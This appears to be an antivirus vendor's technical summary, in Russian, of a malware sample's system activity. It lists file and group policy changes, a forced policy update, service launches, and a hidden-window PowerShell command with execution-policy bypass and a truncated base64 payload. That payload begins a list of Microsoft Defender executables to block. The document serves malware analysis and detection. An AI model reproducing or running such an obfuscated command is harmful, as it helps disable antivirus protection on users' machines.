Техническая информация
- %TEMP%\tmp38de.tmp
- <SYSTEM32>\grouppolicy\gpt.ini
- <SYSTEM32>\grouppolicy\machine\registry.pol
- %TEMP%\tmp38de.tmp
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -p -s fhsvc
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -s WPDBusEnum
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABFAHgAZQBUAG8AQgBsAG8AYwBrACAAPQAgAEAAKAAiACoAXABNAHAARABlAGYAZQBuAGQAZQByAEMAbwByAGUAUwBlAHIAdgBpAGMAZQAuAGUAeABlACIALAAiACoAXABNAHMATQBwAE... (со скрытым окном)